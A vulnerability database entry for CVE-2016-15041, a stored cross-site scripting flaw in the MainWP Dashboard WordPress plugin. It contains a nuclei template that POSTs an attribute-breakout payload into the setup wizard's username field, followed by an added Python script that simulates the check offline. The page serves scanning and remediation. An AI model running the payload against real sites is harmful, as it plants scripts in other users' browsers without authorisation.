MainWP Dashboard <= 3.1.2 - Stored Cross-Site Scripting

Published: 04 Feb 2026 07:00:26 | Reported by: ProjectDiscovery | Type: nuclei | Source: github.com

MainWP Dashboard up to 3.1.2 stores the mwp_setup_purchase_username value submitted to the setup wizard without sanitization and echoes it back without output escaping, so an unauthenticated attacker can plant a script that runs in the browser of any user who later opens that wizard page. Update the plugin.

Related

Reporter              | Title                                                                                                                                   | Published
GithubExploit         | Exploit for Cross-site Scripting in Mainwp Mainwp_Dashboard                                                                              | 25 Dec 2025 09:38
GithubExploit         | Exploit for Cross-site Scripting in Mainwp Mainwp_Dashboard                                                                              | 25 Dec 2025 07:00
Circl                 | CVE-2016-15041                                                                                                                          | 25 Dec 2025 15:00
CNNVD                 | WordPress plugin MainWP Dashboard cross-site scripting vulnerability                                                                     | 16 Oct 2024 00:00
CVE                   | CVE-2016-15041                                                                                                                          | 16 Oct 2024 06:43
Cvelist               | CVE-2016-15041 MainWP Dashboard – The Private WordPress Manager for Multiple Website Maintenance Plugin <= 3.1.2 - Stored Cross-Site Scripting | 16 Oct 2024 06:43
EUVD                  | EUVD-2016-10785                                                                                                                         | 7 Oct 2025 00:30
NVD                   | CVE-2016-15041                                                                                                                          | 16 Oct 2024 07:15
Positive Technologies | PT-2024-10574                                                                                                                           | 16 Oct 2024 00:00
RedhatCVE             | CVE-2016-15041                                                                                                                          | 6 Feb 2025 03:10

Code

id: CVE-2016-15041

info:
  name: MainWP Dashboard <= 3.1.2 - Stored Cross-Site Scripting
  author: flame
  severity: high
  description: |
    MainWP Dashboard – The Private WordPress Manager for Multiple Website Maintenance plugin for WordPress versions up to 3.1.2 contains a stored cross-site scripting vulnerability caused by insufficient input sanitization and output escaping of the 'mwp_setup_purchase_username' parameter, letting unauthenticated attackers inject arbitrary scripts that execute when users access affected pages.
  impact: |
    Unauthenticated attackers can inject scripts that execute in users' browsers, potentially leading to session hijacking, defacement, or redirection.
  remediation: |
    Update to the latest version of the plugin that addresses this vulnerability.
  reference:
    - https://klikki.fi/mainwp-admin-panel-unauthenticated-stored-xss/
  metadata:
    verified: true
    max-request: 4
    fofa-query: "/wp-content/plugins/mainwp/"
  tags: cve,cve2016,mainwp,wordpress,xss,wp,wp-plugin,vkev

variables:
  randstr: "{{rand_base(8)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/mainwp/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '<= 3.1.2')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension&_wpnonce={{nonce}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mwp_setup_purchase_username={{randstr}}"+onmouseover%3Dalert(document.domain)+x%3D"&mwp_setup_purchase_passwd=test&save_step=1

      - |
        GET /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '_wpnonce" value="([a-zA-Z0-9]+)"'
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "MainWP"
          - "Setup Wizard"
          - "mwp_setup_purchase_username"
        condition: and

      - type: word
        part: body_3
        words:
          - ' onmouseover=alert(document.domain) x'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100be4a0aab8a0674178125439960de423fe5845f9adec80cfdf9bf84be930aa8de02202f2ac43ce1b67d7fef376c9c5c8dc34b468ca363bf61a204d88655e6613c92f0:922c64590222798bb761d5b6d8e72950
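The template above chains two stages: a version gate on the plugin's readme.txt, then a nonce fetch, the POST of the payload, and a re-read of the wizard step to see whether the value comes back unescaped. The Python below is an added example, not code from the nuclei template or from MainWP: it replays that flow offline against constructed stand-ins for the server responses so the extractor regexes, the version comparison and the matcher can be inspected. It also shows a caveat a practitioner should know: the template's body_3 word matcher (the bare substring ' onmouseover=alert(document.domain) x') still matches when the stored value is rendered through attribute escaping, because escaping turns only the quote into &quot; and leaves the rest intact; only a check that requires the canary followed by a raw '"' distinguishes a real attribute breakout. html.escape stands in for esc_attr()-style escaping, and render_setup_page, simulate and the sample readme/nonce values are assumptions made for the example.

```python
"""
Offline walk-through of the nuclei template's two-stage flow for
CVE-2016-15041 (MainWP Dashboard <= 3.1.2, stored XSS via
mwp_setup_purchase_username). Added example, not code from the nuclei
template or from MainWP. The readme text and wizard HTML below are
constructed stand-ins for real server responses; escape_output=True
imitates esc_attr()-style attribute escaping with Python's html.escape.
"""
import html
import re
import secrets
import string
from urllib.parse import urlencode

STABLE_TAG_RE = re.compile(r"Stable tag: ([0-9.]+)")        # template's version extractor
NONCE_RE = re.compile(r'_wpnonce" value="([a-zA-Z0-9]+)"')  # template's nonce extractor
LOOSE_MARKER = " onmouseover=alert(document.domain) x"       # template's body_3 word matcher
FIXED_CEILING = "3.1.2"                                      # compare_versions(version, '<= 3.1.2')


def extract_version(readme_body: str):
    """Stage 1: pull 'Stable tag' out of /wp-content/plugins/mainwp/readme.txt."""
    m = STABLE_TAG_RE.search(readme_body)
    return m.group(1) if m else None


def version_tuple(v: str):
    return tuple(int(p) for p in v.split("."))


def is_vulnerable_version(v: str) -> bool:
    """True when the plugin version is <= 3.1.2, i.e. the template's internal gate passes."""
    return version_tuple(v) <= version_tuple(FIXED_CEILING)


def extract_nonce(setup_page_body: str):
    """Stage 2, request 1: read the _wpnonce the wizard form embeds."""
    m = NONCE_RE.search(setup_page_body)
    return m.group(1) if m else None


def rand_base(n: int = 8) -> str:
    """Stand-in for nuclei's {{rand_base(8)}}: an unpredictable canary of letters and digits."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def build_post_body(randstr: str) -> str:
    """Stage 2, request 2: the same form fields the template POSTs (url-encoded)."""
    username = f'{randstr}" onmouseover=alert(document.domain) x="'
    return urlencode({
        "mwp_setup_purchase_username": username,
        "mwp_setup_purchase_passwd": "test",
        "save_step": "1",
    })


def render_setup_page(stored_username: str, escape_output: bool) -> str:
    """Constructed wizard page (assumption, not MainWP markup).
    escape_output=False echoes the stored value raw, as the unpatched plugin does;
    True runs it through attribute escaping, as esc_attr() would."""
    shown = html.escape(stored_username, quote=True) if escape_output else stored_username
    return ('<h1>MainWP Setup Wizard</h1>'
            f'<input type="text" name="mwp_setup_purchase_username" value="{shown}">')


def loose_match(body: str) -> bool:
    """The template's check: bare substring ' onmouseover=alert(document.domain) x'."""
    return LOOSE_MARKER in body


def attribute_breakout(body: str, randstr: str) -> bool:
    """Stricter check: canary followed by a raw, unescaped quote, proving the value
    actually closed the attribute. Escaped output (&quot;) cannot satisfy this."""
    return f'{randstr}" onmouseover=alert(document.domain) x="' in body


def simulate(randstr: str, escape_output: bool) -> dict:
    """Stored-then-reflected round trip against the constructed page; returns both verdicts."""
    username = f'{randstr}" onmouseover=alert(document.domain) x="'
    page = render_setup_page(username, escape_output)
    return {"loose": loose_match(page), "strict": attribute_breakout(page, randstr)}


if __name__ == "__main__":
    readme = "=== MainWP Dashboard ===\nStable tag: 3.1.2\n"                       # constructed
    wizard = '<input type="hidden" id="_wpnonce" name="_wpnonce" value="a1b2c3d4e5" />'  # constructed
    v = extract_version(readme)
    print("version:", v, "| gate passes:", is_vulnerable_version(v))
    print("nonce:", extract_nonce(wizard))
    canary = rand_base()
    print("POST body:", build_post_body(canary))
    print("unpatched :", simulate(canary, escape_output=False))
    print("escaped   :", simulate(canary, escape_output=True))
```

Running it prints the loose verdict as True in both the raw and the escaped rendering, while the strict verdict is True only for the raw one; in the real template the version gate on readme.txt is what keeps the loose matcher from reporting escaped-but-stored values on a fixed release, so when adapting the check to a target whose readme is blocked, prefer the stricter canary-plus-quote match.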


Scores (as of 04 Feb 2026 07:00, current)
Vulners AI Score: 6.5 (Medium risk)
CVSS 3.1: 6.1 - 7.2
EPSS: 0.03874
SSVC